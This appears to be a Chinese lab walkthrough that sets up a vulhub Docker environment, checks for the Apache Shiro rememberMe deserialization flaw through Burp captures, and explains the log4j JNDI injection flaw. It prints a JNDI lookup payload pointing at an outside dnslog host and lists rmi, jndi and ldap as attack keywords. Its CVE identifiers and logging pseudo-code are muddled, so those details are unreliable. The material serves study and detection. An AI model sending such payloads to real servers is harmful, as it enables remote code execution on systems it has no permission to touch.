当前位置: 首页 > news >正文

版权申请网站点击排名优化

版权申请网站,点击排名优化,页面升级紧急通知自动跳转中,广州网站建设 知名文章目录 安装环境shiro漏洞验证log4j 安装环境 进入vulhb目录下的weblogic,复现CVE-2018-2894漏洞: cd /vulhub/shiro/CVE-2010-3863查看docker-compose的配置文件: cat docker-compose.yml如图,里面有一个镜像文件的信息和服…

文章目录

  • 安装环境
  • shiro漏洞验证
  • log4j

安装环境

进入vulhb目录下的weblogic,复现CVE-2018-2894漏洞:

cd /vulhub/shiro/CVE-2010-3863

查看docker-compose的配置文件:

cat docker-compose.yml

如图,里面有一个镜像文件的信息和服务名,以及它的端口号(后面要用):

在这里插入图片描述

然后使用下面命令,搭建docker-compose并启动:

sudo docker-compose up -d && sudo docker-compose up -d

如图,安装成功:
在这里插入图片描述

shiro漏洞验证

原理如下

Apache Shiro框架提供了记住我的功能(RememberMe),用户登陆成功后会生成经过加密并编码的cookie,在服务端接收cookie值后,Base64解码–>AES解密–>反序列化。攻击者只要找到AES加密的密钥,就可以构造一个恶意对象,对其进行序列化–>AES加密–>Base64编码,然后将其作为cookie的rememberMe字段发送,Shiro将rememberMe进行解密并且反序列化,最终造成反序列化漏洞。

用bp自带的浏览器打开http://10.9.75.45:8080/,随意输入用户名密码并勾选记住我
在这里插入图片描述

点击登录后抓包,发送到repeat模块,发现请求包中有rememberme字段:

在这里插入图片描述

点击send发送,响应包中有set-cookie字段,并有rememberMe=deleteMe内容,这是一个shiro反序列化漏洞的强特征,说明有极大的可能存在shiro反序列化:

在这里插入图片描述

log4j

log4j(log for Java)是Apache的一个开源项目,是一个基于Java的日志记录框架。该漏洞的主要原因是log4j在日志输出中,未对字符合法性进行严格的限制,执行了JNDI协议加载的远程恶意脚本,从而造成RCE。

它是一个RCE命令执行的漏洞,它的日志的输出如下:print函数双引号中的内容会被当做字符处理

$user=$_GET("user");
log.print(“用户$user登录失败”);

如果print函数中出现如${jndi:ldap://lof4ot.dnslog.cn/exp}的内容,就会将大括号中的内容当做命令执行

如果流量中遇到下面三个关键字,极大可能是Java的漏洞攻击:

rmi、jndi、ldap

http://www.yidumall.com/news/68228.html

相关文章:

  • 知名的电子商务网站网站快速排名服务
  • 新疆网架公司东莞关键词seo
  • p2c网站方案移动端seo关键词优化
  • 企业网站找谁做企业营销策划及推广
  • 透视图在什么网站上可以做深圳网络推广网站推广
  • 外贸购物网站建站百度查询
  • 网站地图什么意思怎么推广自己的公司
  • 宜春网站建设公司百度首页纯净版
  • WordPress runcode插件seo优化需要做什么
  • boostrop怎么做网站西安外包公司排行
  • 自建电商网站有哪些广告推广系统
  • 建设银行网站怎么不可登入株洲seo优化推荐
  • 南京网站搭建公司seo百度网站排名软件
  • 温州做网站公司有哪些小说排行榜2020前十名
  • 网站怎么做seo优化啊网络销售工资一般多少
  • 网站收录在下降老客外链
  • 网站规划建设方案产品市场推广方案范文
  • 在线做分析图的网站百度指数分析工具
  • 怎么用服务器ip做网站热点新闻最新消息
  • 宠物网站开发与实现百度点击软件
  • wordpress做网站卡吗seo网站是什么意思
  • 深圳注册公司需要哪些材料和流程站长工具seo客户端
  • 长沙手机网站公司seo工资待遇 seo工资多少
  • 网站建设中 源码成都百度推广电话
  • 成都网站开发建设推广深圳网络推广怎么做
  • 聊城网站建设开发站长工具官网
  • 企业网站 wordpress网络广告的形式有哪些
  • 衡水网站建设哪家好网图搜索识别
  • 深圳云购网站制作百度百科官网登录
  • 滕州市做淘宝网站的百度营销大学